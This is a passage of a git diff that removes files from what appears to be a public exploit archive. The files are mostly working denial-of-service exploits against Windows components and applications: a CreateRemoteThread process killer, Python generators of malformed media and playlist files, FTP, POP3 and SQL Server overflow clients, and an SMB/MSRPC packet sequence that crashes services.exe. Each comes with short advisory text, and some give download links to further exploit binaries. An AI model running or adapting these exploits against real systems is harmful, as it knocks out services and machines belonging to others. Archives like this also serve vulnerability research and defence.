Service Pack 1 is affected by this issue. - -Tsshutdn 0 /SERVER:yyyzzz /DELAY:0 \ No newline at end of file diff --git a/platforms/windows/local/26690.c b/platforms/windows/local/26690.c deleted file mode 100755 index 882820f33..000000000 --- a/platforms/windows/local/26690.c +++ /dev/null @@ -1,177 +0,0 @@ -source: http://www.securityfocus.com/bid/15671/info - -Microsoft Windows is prone to a local denial of service vulnerability. This issue can allow an attacker to trigger a system wide denial of service condition or terminate arbitrary processes. - -Reports indicate that a process can call the 'CreateRemoteThread' function to trigger this issue. - -It was reported that this attack can be carried out by a local unprivileged user. - -#include -#include -#include - -BOOL exploit(char* chProcessName) -{ - - HANDLE hProcessSnap = NULL; - - HANDLE hProcess = NULL; - - BOOL bFound = FALSE; - - BOOL bRet = FALSE; - - PROCESSENTRY32 pe32 = {0}; - - UINT uExitCode = 0; - - DWORD dwExitCode = 0; - - LPDWORD lpExitCode = &dwExitCode; - - - - - - hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); - - if (hProcessSnap == INVALID_HANDLE_VALUE) - return (FALSE); - - pe32.dwSize = sizeof(PROCESSENTRY32); - - printf("\n[+] Search For Process ... \n"); - - - while(!bFound && Process32Next(hProcessSnap, &pe32)) - { - if(lstrcmpi(pe32.szExeFile, chProcessName) == 0) - bFound = TRUE; - - } - - CloseHandle(hProcessSnap); - - if(!bFound){ - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - - printf("[-] Sorry Process Not Find \n"); - - return(FALSE); - - } - printf("[+] Process Find \n"); - - hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); - - - if(hProcess == NULL){ - - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - - printf("[-] Sorry Write Access Denied for This Process \n"); - printf("[-] Exploit Failed :( \n"); - - return(FALSE); - } - - - printf("[+] Write Access Is allowed \n"); - - printf("[+] Send Exploit To Process ...\n"); - - CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0); - - printf("[+] Successful :)\n"); - - - return(pe32.th32ProcessID); -} - -int main(int argc,char **argv) -{ -char* chProcess = argv[1]; - - COORD coordScreen = { 0, 0 }; - DWORD cCharsWritten; - CONSOLE_SCREEN_BUFFER_INFO csbi; - DWORD dwConSize; - HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE); - - GetConsoleScreenBufferInfo(hConsole, &csbi); - dwConSize = csbi.dwSize.X * csbi.dwSize.Y; - FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize, - coordScreen, &cCharsWritten); - GetConsoleScreenBufferInfo(hConsole, &csbi); - FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize, - coordScreen, &cCharsWritten); - SetConsoleCursorPosition(hConsole, coordScreen); - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_GREEN| FOREGROUND_INTENSITY) ; - - - if(argc < 2) { - - - printf("\n"); - printf(" - ========================================================================== \n"); - printf(" > Microsoft Windows CreateRemoteThread - Exploit < \n"); - printf(" > BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com - < \n"); - - printf(" > Exploited By Q7X ( Nima Salehi ) - Q7X@Ashiyane.com < \n"); - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE); - - - printf(" > Compile : cl -o nima.c ( Win32/VC++ ) - < \n"); - - printf(" > Usage : nima.exe Process - < \n"); - printf(" > Example : nima.exe explorer.exe - < \n"); - printf(" > Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000 - AdvServer (SP4) < \n"); - printf(" > Windows 2000 Server (SP4), Windows 2003 (SP0 , - SP1) < \n"); - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED| FOREGROUND_INTENSITY) ; - - printf(" > Copyright 2002-2005 By Ashiyane Digital Network - Security Team < \n"); - printf(" > www.Ashiyane.com ( Free ) www.Ashiyane.net ( Not - Free ) < \n"); - - printf(" > Special Tanx To My Best Friend Behrooz_Ice - < \n"); - - printf(" - ========================================================================== \n"); - - - } - else - - exploit(chProcess); - - - - - - SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), - FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE); - - -} - diff --git a/platforms/windows/local/28227.txt b/platforms/windows/local/28227.txt deleted file mode 100755 index 6ca37e683..000000000 --- a/platforms/windows/local/28227.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/18995/info - -Microsoft Windows is prone to a denial-of-service vulnerability. - -This issue occurs when a program calls certain API calls for manipulating Windows registry keys. This may crash the affected computer. - -NOTE: This BID has been revised (July 3, 2007); the issue was originally thought to be a vulnerability in Symantec Norton Personal Firewall, but further investigation reveals a problem in an underlying OS API. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28227.zip \ No newline at end of file diff --git a/platforms/windows/local/30308.py b/platforms/windows/local/30308.py deleted file mode 100755 index 00c5c7cae..000000000 --- a/platforms/windows/local/30308.py +++ /dev/null @@ -1,48 +0,0 @@ -########################################################### -#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero -#Exploit) -#[~] Author: sajith -#[~] version: PotPlayer 1.5.42509 Beta -#[~]Vendor Homepage: http://daumpotplayer.com/ -#[~] Tested in: Windows XP SP3 -#[~] vulnerable app link:http://daumpotplayer.com/download/ -########################################################### - -#POC: -#------- -#!/usr/bin/python -raw_input("Hit Enter to create a malicious file") - -f = open("victim.wav","w") - -header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01" -"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E" -"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22" -"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") -f.write(header) - -print "[#] File created by sajith shetty" - -raw_input("Hit enter to exit") -#----- -''' -(694.4d8): Integer divide-by-zero - code c0000094 (first chance) -First chance exceptions are reported before any exception handling. -This exception may be expected and handled. -eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff -edi=0021977a -eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe -nc -cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 -efl=00010246 -''' \ No newline at end of file diff --git a/platforms/windows/local/35530.py b/platforms/windows/local/35530.py deleted file mode 100755 index 63443d765..000000000 --- a/platforms/windows/local/35530.py +++ /dev/null @@ -1,24 +0,0 @@ -# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u) -# Date: 11/29/2010 -# Author: Hadji Samir s-dz@hotmail.fr -# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe -# Version: 0.8.33 build 5680 - - EAX 0012E508 - ECX 43434343 - EDX 00000000 - EBX 43434343 - ESP 0012E4A4 - EBP 0012E4F4 - ESI 0012E508 - EDI 00000000 - -#!/usr/bin/python -buffer = ("http://" + "A" * 845) -nseh = ("B" * 4) -seh = ("C" * 4) -junk = ("D" * 60) - -f= open("exploit.m3u",'w') -f.write(buffer + nseh + seh + junk) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/35531.py b/platforms/windows/local/35531.py deleted file mode 100755 index 8f86c07c6..000000000 --- a/platforms/windows/local/35531.py +++ /dev/null @@ -1,25 +0,0 @@ -# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) -# Date: 11/29/2010 -# Author: Hadji Samir s-dz@hotmail.fr -# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe -# Version: 0.8.33 build 5680 - - EAX 0012E788 - ECX 43434343 - EDX 00000000 - EBX 43434343 - ESP 0012E724 - EBP 0012E774 - ESI 0012E788 - EDI 00000000 - -#!/usr/bin/python - -buffer = ("http://" + "A" * 845) -nseh = ("B" * 4) -seh = ("C" * 4) -junk = ("D" * 60) - -f= open("exploit.lst",'w') -f.write(buffer + nseh + seh + junk) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/35532.py b/platforms/windows/local/35532.py deleted file mode 100755 index cc8390422..000000000 --- a/platforms/windows/local/35532.py +++ /dev/null @@ -1,47 +0,0 @@ -# jaangle 0.98i.977 Denial of Service Vulnerability -# Author: hadji samir , s-dz@hotmail.fr -# Download : http://www.jaangle.com/downloading?block -# Tested : Windows 7 (fr) -# DATE : 2012-12-13 -# - -################################################################### - - -EAX 000000C0 -ECX 00000000 -EDX 00000000 -EBX 00000003 -ESP 01C5FE28 -EBP 01C5FF88 -ESI 00000002 -EDI 002B4A98 -EIP 776964F4 ntdll.KiFastSystemCallRet -C 0 ES 0023 32bit 0(FFFFFFFF) -P 1 CS 001B 32bit 0(FFFFFFFF) -A 0 SS 0023 32bit 0(FFFFFFFF) -Z 0 DS 0023 32bit 0(FFFFFFFF) -S 0 FS 003B 32bit 7FFDC000(8000) -T 0 GS 0000 NULL -D 0 -O 0 LastErr ERROR_SUCCESS (00000000) -EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G) -ST0 empty g -ST1 empty g -ST2 empty g -ST3 empty g -ST4 empty g -ST5 empty g -ST6 empty g -ST7 empty g - 3 2 1 0 E S P U O Z D I -FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) -FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 - -#!/usr/bin/python - -buff = ("\x41" * 30000 ) - -f = open("exploit.m3u",'w') -f.write( buff ) -f.close() \ No newline at end of file diff --git a/platforms/windows/local/9871.txt b/platforms/windows/local/9871.txt deleted file mode 100755 index b9cf8e66a..000000000 --- a/platforms/windows/local/9871.txt +++ /dev/null @@ -1,22 +0,0 @@ -############################################################################# -# -# Boloto Media Player 1.0.0.9 Local (.PLS) Crash PoC -# Found By: Dr_IDE -# Download: http://www.tucows.com/preview/602821 -# Tested On: XPSP3 -# Note: It locks hard if you add this file to the playlist and click. -# -############################################################################# - -buff = ("\x41" * 5000) - -try: - f1 = open("evil.pls","w"); - f1.write("[playlist]\nNumberOfFiles=3\n\nFile1=http://" + buff); - f1.close(); - -except: - print ("[-] Error. File couldn't be created."); - - -#[pocoftheday.blogspot.com] diff --git a/platforms/windows/remote/10073.py b/platforms/windows/remote/10073.py deleted file mode 100755 index 50b2e74d4..000000000 --- a/platforms/windows/remote/10073.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/python -print "\n###############################################################" -print "## Iranian Pentesters Home ##" -print "## Www.Pentesters.Ir ##" -print "## PLATEN -[ H.jafari ]- ##" -print "## XM Easy Personal FTP Server 5.8 Remote Denial Of Service ##" -print "## http://www.dxm2008.com/data/ftpserversetup.exe ##" -print "## author: PLATEN ##" -print "## E-mail && blog: ##" -print "## hjafari.blogspot.com ##" -print "## platen.secure[at]gmail[dot]com ##" -print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder ##" -print "## and all members in Pentesters.ir ##" -print "############################################################### \n" -import socket -import sys - -def Usage(): - print ("Usage: ./expl.py \n") -buffer= "./A" * 6300 -subme() -def start(hostname, username, passwd): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - try: - sock.connect((hostname, 21)) - except: - print ("[-] Connection error!") - sys.exit(1) - r=sock.recv(1024) - print "[+] " + r - sock.send("user %s\r\n" %username) - r=sock.recv(1024) - sock.send("pass %s\r\n" %passwd) - r=sock.recv(1024) - print "[+] Send evil string" - sock.send("nlst %s\r\n" %buffer) - sock.close() - -if len(sys.argv) <> 4: - Usage() - sys.exit(1) -else: - hostname=sys.argv[1] - username=sys.argv[2] - passwd=sys.argv[3] - start(hostname,username,passwd) - sys.exit(0) diff --git a/platforms/windows/remote/1183.c b/platforms/windows/remote/1183.c index c2b6e68fd..c874f8897 100755 --- a/platforms/windows/remote/1183.c +++ b/platforms/windows/remote/1183.c @@ -481,6 +481,6 @@ u_int resolv(char *host) { perror("\nError"); exit(1); } -#endif - -// milw0rm.com [2005-08-29] +#endif + +// milw0rm.com [2005-08-29] diff --git a/platforms/windows/remote/19238.txt b/platforms/windows/remote/19238.txt deleted file mode 100755 index 43a86872f..000000000 --- a/platforms/windows/remote/19238.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/298/info - -NT Workstations and Servers must have unique hostnames if they reside on the same network. Should an NT host attempt to use an existing hostname, the second server (with the new duplicate name) will fail to start its workstation and server services. (Once the name has been changed to a unique value and has been rebooted, the host will operate normally). - -Should an NT host claim the hostname of a "victim" NT host while that host is turned off, the "victim" host will be subject to a Denial of Service-like attack because the workstation and server services will fail to start. NT hosts are usually prevented from taking duplicate names within one domain they must register their existence with an NT Domain Controller when initially joining the domain. (This registration process must be performed by someone with administrator privileges.) - -A situation has been noted wherein a Win95 host may register the victim hostname (with a WINS server) by setting the Win95 workgroup name equal to the victim's hostname. The next time the victim host is rebooted, it will fail to start the workstation and server services as the WINS server will report that the hostname is claimed by the Win95 host. - -Set the Win95 workgroup name equal to the hostname for the victim NT host. If the WINS server registers this hostname, and the victim NT host is rebooted, it will fail to start its workstation and server services. \ No newline at end of file diff --git a/platforms/windows/remote/19577.py b/platforms/windows/remote/19577.py deleted file mode 100755 index 6a50078c5..000000000 --- a/platforms/windows/remote/19577.py +++ /dev/null @@ -1,161 +0,0 @@ -source: http://www.securityfocus.com/bid/754/info - -A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will crash the "services" executable, which in turn, disables the ability for the machine to perform actions via named pipes. As a consequence, users will be unable to remotely logon, logoff, manage the registry, create new file share connections, or perform remote administration. Services such as Internet Information Server may also fail to operate as expected. Rebooting the affected machine will resolve the issue, provided it is not attacked again. - -The problem lies within the manner that srvsvc.dll makes calls to services.exe. Certain MSRPC calls will return NULL values which are not correctly interpreted by services.exe. This, in turn, may lead to a crash of Services.exe. - -If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. - -#!/usr/bin/env python -# -# Services.exe DoS -# hard work done by: rfp@wiretrip.net -# Python hack by: nas@adler.dynodns.net -# -# This only seems to work on NT. Also, it may have to be run multiple times -# before SERVICES.EXE will die. Improvements welcome. -# -# Usage: rfpoison.py - -import string -import struct -from socket import * -import sys - -def a2b(s): - bytes = map(lambda x: string.atoi(x, 16), string.split(s)) - data = string.join(map(chr, bytes), '') - return data - -def b2a(s): - bytes = map(lambda x: '%.2x' % x, map(ord, s)) - return string.join(bytes, ' ') - -# NBSS session request -nbss_session = a2b(""" - 81 00 00 48 20 43 4b 46 44 45 - 4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43 - 41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45 - 42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46 - 43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00 - 00 00 - """) - -# SMB stuff -crud = ( - # SMBnegprot Request - """ - ff 53 4d 42 72 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43 - 20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d - 20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20 - 4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d - 49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b - 53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30 - 00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d - 62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e - 30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 - """, - - # SMBsessetupX Request - """ - ff 53 4d 42 73 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff - ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00 - 00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f - 55 50 00 55 6e 69 78 00 53 61 6d 62 61 00 - """, - - # SMBtconX Request - """ - ff 53 4d 42 75 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00 - 00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56 - 45 52 5c 49 50 43 24 00 49 50 43 00 - """, - - # SMBntcreateX request - """ - ff 53 4d 42 a2 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00 - 07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00 - 00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00 - 00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72 - 76 73 76 63 00 - """, - - # SMBtrans Request - """ - ff 53 4d 42 25 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00 - 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c - 00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49 - 50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00 - 00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00 - 00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78 - 5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c - c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 - """, - - # SMBtrans Request - """ - ff 53 4d 42 25 00 - 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 - 00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00 - 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c - 00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49 - 50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00 - 00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00 - 00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00 - 5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00 - 56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00 - 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 - """ -) -crud = map(a2b, crud) - - -def smb_send(sock, data, type=0, flags=0): - d = struct.pack('!BBH', type, flags, len(data)) - #print 'send:', b2a(d+data) - sock.send(d+data) - -def smb_recv(sock): - s = sock.recv(4) - assert(len(s) == 4) - type, flags, length = struct.unpack('!BBH', s) - data = sock.recv(length) - assert(len(data) == length) - #print 'recv:', b2a(s+data) - return type, flags, data - -def nbss_send(sock, data): - sock.send(data) - -def nbss_recv(sock): - s = sock.recv(4) - assert(len(s) == 4) - return s - -def main(host, port=139): - s = socket(AF_INET, SOCK_STREAM) - s.connect(host, port) - nbss_send(s, nbss_session) - nbss_recv(s) - for msg in crud[:-1]: - smb_send(s, msg) - smb_recv(s) - smb_send(s, crud[-1]) # no response to this - s.close() - -if __name__ == '__main__': - print 'Sending poison...', - main(sys.argv[1]) - print 'done.' - ---82I3+IH0IqGh5yIs-- diff --git a/platforms/windows/remote/19578.txt b/platforms/windows/remote/19578.txt deleted file mode 100755 index a2d3216f2..000000000 --- a/platforms/windows/remote/19578.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/754/info - -A specially crafted packet can cause a denial of service on an NT 4.0 host, rendering local administration and network communication nearly unusable. This attack will crash the "services" executable, which in turn, disables the ability for the machine to perform actions via named pipes. As a consequence, users will be unable to remotely logon, logoff, manage the registry, create new file share connections, or perform remote administration. Services such as Internet Information Server may also fail to operate as expected. Rebooting the affected machine will resolve the issue, provided it is not attacked again. - -The problem lies within the manner that srvsvc.dll makes calls to services.exe. Certain MSRPC calls will return NULL values which are not correctly interpreted by services.exe. This, in turn, may lead to a crash of Services.exe. - -If this denial of service is combined with a number of other exploits, it may be possible to have this attack spawn a Debugger (ie Dr Watson) call on the host, which, if trojaned, may execute malicious code on the target host. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19578.zip \ No newline at end of file diff --git a/platforms/windows/remote/19596.txt b/platforms/windows/remote/19596.txt deleted file mode 100755 index 2f372a8de..000000000 --- a/platforms/windows/remote/19596.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/771/info - -BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a user name of 3090 or more characters is supplied. - - -telnet victim.com -Login: [3090 charcter string] \ No newline at end of file diff --git a/platforms/windows/remote/19616.c b/platforms/windows/remote/19616.c deleted file mode 100755 index d4adf5199..000000000 --- a/platforms/windows/remote/19616.c +++ /dev/null @@ -1,164 +0,0 @@ -source: http://www.securityfocus.com/bid/789/info - -There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. - -Exploit (by Interrupt): - - -/* - * IMAIL 5.07 POP3 Overflow - * By: Mike@eEye.com - * - * Demonstrates vulnerability - */ - - - #include - #include - - -#ifdef WINDOWS - #include - #include -#else - #include - #include - #include - #include -#endif - - -#ifndef WINDOWS - #define SOCKET_ERROR -1 - #define closesocket(sock) close(sock) - #define WSACleanup() ; -#endif - - -char overflow[] = - "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"; - - -int main(int argc, char *argv[]) -{ -#ifdef WINDOWS - WSADATA wsaData; -#endif - - - struct hostent *hp; - struct sockaddr_in sockin; - char buf[300], *check; - int sockfd, bytes; - char *hostname; - unsigned short port; - - - if (argc <= 1) - { - printf("IMAIL POP3 Overflow\n"); - printf("By: Mike@eEye.com\n\n"); - - - printf("Usage: %s [hostname] [port]\n", argv[0]); - printf("If port is not specified we use '110'\n"); - - - exit(0); - } - - - hostname = argv[1]; - if (argv[2]) port = atoi(argv[2]); - else port = atoi("110"); - - - printf("IMAIL POP3 Overflow\n"); - printf("By: Mike@eEye.com\n\n"); - - -#ifdef WINDOWS - if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - fprintf(stderr, "Error setting up with WinSock v1.1\n"); - exit(-1); - } -#endif - - - hp = gethostbyname(hostname); - if (hp == NULL) - { - printf("ERROR: Uknown host %s\n", hostname); - exit(-1); - } - - - sockin.sin_family = hp->h_addrtype; - sockin.sin_port = htons(port); - sockin.sin_addr = *((struct in_addr *)hp->h_addr); - - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) - { - printf("ERROR: Socket Error\n"); - exit(-1); - } - - - if ((connect(sockfd, (struct sockaddr *) &sockin, - sizeof(sockin))) == SOCKET_ERROR) - { - printf("ERROR: Connect Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - printf("Connected to [%s] on port [%d], sending overflow....\n", - hostname, port); - - - /* Check to see if we get a +OK error code. If so then proceed. */ - if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) - { - printf("ERROR: Recv Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(1); - } - - - buf[bytes] = '\0'; - check = strstr(buf, "+OK"); - if (check == NULL) - { - printf("ERROR: NO +OK response from inital connect\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) - { - printf("ERROR: Send Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - - printf("Sent.\n"); - - - closesocket(sockfd); - WSACleanup(); -} - diff --git a/platforms/windows/remote/19636.txt b/platforms/windows/remote/19636.txt deleted file mode 100755 index 9bc9fe5ef..000000000 --- a/platforms/windows/remote/19636.txt +++ /dev/null @@ -1,13 +0,0 @@ -source: http://www.securityfocus.com/bid/813/info - -The ZetaMail mail server will crash if a username/password pair longer than 3500 characters is supplied by the client. - -19636-1.exe - binary for windows -19636-2.zip - source for windows -19636-3.tgz - source for linux - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-1.exe - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-2.zip - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19636-3.tgz \ No newline at end of file diff --git a/platforms/windows/remote/19638.c b/platforms/windows/remote/19638.c deleted file mode 100755 index 5a231379b..000000000 --- a/platforms/windows/remote/19638.c +++ /dev/null @@ -1,64 +0,0 @@ -source: http://www.securityfocus.com/bid/817/info - -If Microsoft SQL Server 7.0 receives a TDS header with three or more NULL bytes as data it will crash. The crash will generate an event in the log with ID 17055 "fatal exception EXCEPTION_ACCESS VIOLATION". - -/* -** sqldos.c -- a DoS attack agains MS SQL Server -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define PORT 1433 /* the port SQL Server listens on */ - - -int main(int argc, char *argv[]) -{ - int sockfd, numbytes; - struct hostent *he; - char buff[65535]; - struct sockaddr_in target_addr; - - if (argc != 2) { - fprintf(stderr,"Usage: sqldos target\n"); - exit(1); - } - - if ((he=gethostbyname(argv[1])) == NULL) - - perror("gethostbyname"); - exit(1); - } - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { - perror("socket error"); - exit(1); - } - - target_addr.sin_family = AF_INET; - target_addr.sin_port = htons(PORT); - target_addr.sin_addr = *((struct in_addr *)he->h_addr); - bzero(&(target_addr.sin_zero), 8); - - if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct -sockaddr)) == -1) { - perror("connect error"); - exit(1); - } - memset(&buff, 0, 3); - - if ((numbytes=send(sockfd, buff, 14, 0)) == -1) { - perror("send errot"); - exit(1); - } - close(sockfd); - - return 0; -} - diff --git a/platforms/windows/remote/19640.txt b/platforms/windows/remote/19640.txt deleted file mode 100755 index cd620d5c4..000000000 --- a/platforms/windows/remote/19640.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/823/info - -Alt-N's WorldClient is an email webserver that allows it's users to retrieve email via HTTP. It is susceptible to denial of service attacks due to an unchecked buffer in the request handler. Supplying a long url will crash the server. - -http ://target.host:2000/[long string] \ No newline at end of file diff --git a/platforms/windows/remote/19664.txt b/platforms/windows/remote/19664.txt deleted file mode 100755 index c239febe2..000000000 --- a/platforms/windows/remote/19664.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/859/info - -If the Serv-U FTP server receives an overly long argument to the SITE PASS command, it will crash. To issue this command, an attacker must be already logged in as an authenticated user, including an 'anonymous' user. - -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19664.zip \ No newline at end of file diff --git a/platforms/windows/remote/19695.txt b/platforms/windows/remote/19695.txt deleted file mode 100755 index 791a98814..000000000 --- a/platforms/windows/remote/19695.txt +++ /dev/null @@ -1,5 +0,0 @@ -source: http://www.securityfocus.com/bid/897/info - -The Savant Webserver cannot properly handle null characters in a GET request. If it encounters one, it will crash. The failure is logged in \Logs\general.txt - -http ://target/%00/ \ No newline at end of file diff --git a/platforms/windows/remote/19748.txt b/platforms/windows/remote/19748.txt deleted file mode 100755 index 0fb92f88f..000000000 --- a/platforms/windows/remote/19748.txt +++ /dev/null @@ -1,12 +0,0 @@ -source: http://www.securityfocus.com/bid/982/info - - -Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server. - -telnet target 110 -+OK POP3 Welcome to someco.com 